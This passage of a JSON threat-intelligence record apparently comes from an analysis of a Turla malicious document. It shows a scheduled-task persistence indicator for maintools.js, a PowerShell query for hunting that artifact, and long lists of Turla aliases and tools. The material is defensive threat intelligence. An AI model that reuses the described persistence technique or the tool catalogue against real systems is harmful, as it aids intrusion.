only\",\"N/A\",\"1\",\"user1\",\"c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\maintools.js EzZETcSXyKAdF_e5I2i1\",\"c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\\",\"Windows Task Manager\",\"Enabled\",\"Disabled\",\"Stop On Battery Mode, No Start On Batteries\",\"user1\",\"Enabled\",\"72:00:00\",\"Scheduling data is not available in this format.\",\"At logon time\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\"\r\nIn a corporate environment, it is possible to search for that artifact via a PowerShell query. 
For example, something like this would do the job:\r\nInvoke-Command -ComputerName COMPUTERNAME -ScriptBlock {schtasks /query /fo csv /v | findstr /i maintools} -credential USER\r\nSource: https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html"
	],
	"report_names": [
		"analysis-of-malicious-doc-used-by-turla.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434463,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.pdf",
		"text": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.txt",
		"img": "https://archive.orkl.eu/074b04779bd356b303c6cc77c1afc7853c582e59.jpg"
	}
}